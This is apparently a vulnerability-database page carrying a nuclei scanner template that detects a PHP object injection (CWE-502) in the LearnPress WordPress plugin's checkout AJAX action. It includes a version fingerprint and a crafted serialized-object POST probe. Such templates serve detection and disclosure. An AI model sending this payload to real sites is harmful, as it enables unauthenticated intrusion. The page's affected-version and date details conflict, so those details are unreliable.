Lucene search
+L

LearnPress <= 4.4.9.1 - PHP Object Injection

🗓️ 30 Oct 2026 02:04:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 5 Views

Unauthenticated remote PHP Object Injection in LearnPress via checkout AJAX action.

Related
Refs
Code
id: CVE-2026-104736

info:
  name: LearnPress <= 4.4.9.1 - PHP Object Injection
  author: 0x_Akoko,pdteam
  severity: critical
  description: |
    LearnPress WordPress plugin <= 4.4.10 contains a PHP Object Injection caused by deserialization of untrusted 'checkout-email' parameter in checkout AJAX action, letting unauthenticated attackers inject PHP objects remotely.
  impact: |
    Unauthenticated attackers can inject PHP objects, potentially leading to remote code execution or full system compromise.
  remediation: |
    Update to the latest version beyond 4.4.10.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/3e28e008-0ec1-4262-9ac0-6170cf8b8bdf?source=cve
    - https://patchstack.com/database/wordpress/plugin/learnpress/vulnerability/wordpress-learnpress-wordpress-lms-plugin-for-create-and-sell-online-courses-plugin-4-4-10-unauthenticated-php-object-injection-vulnerability
    - https://github.com/murrez/CVE-2026-104736
    - https://nvd.nist.gov/vuln/detail/CVE-2026-104736
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-104736
    epss-score: 0.02524
    epss-percentile: 0.84826
    cwe-id: CWE-502
  metadata:
    verified: true
    max-request: 2
    vendor: thimpress
    product: learnpress
    fofa-query: body="/wp-content/plugins/learnpress/"
    publicwww-query: "/wp-content/plugins/learnpress/"
  tags: cve,cve2026,wordpress,wp,wp-plugin,learnpress,deserialization,php,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/learnpress/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "LearnPress")'
          - 'compare_versions(plugin_version, "<= 4.4.9.1")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: plugin_version
        group: 1
        regex:
          - '(?i)Stable tag:\s*([0-9.]+)'
        internal: true

  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        lp-ajax=checkout&checkout-email=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A4%3A%22{{rand_text_alpha(4)}}%22%3Bs%3A3%3A%22poc%22%3B%7D

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "LP_AJAX_START")'
          - '!contains(body, "invalid_email")'
        condition: and
# digest: 4a0a00473045022100d00dbe822425e7bf3956f8576ebaead6c795a83eff4e1e1fb0dd730632416baf022025ad737dd6737680506c15ac4c540e55329dfd222046f3d883448232a81f62e9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Oct 2026 00:44Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.8
EPSS0.02524
SSVC
5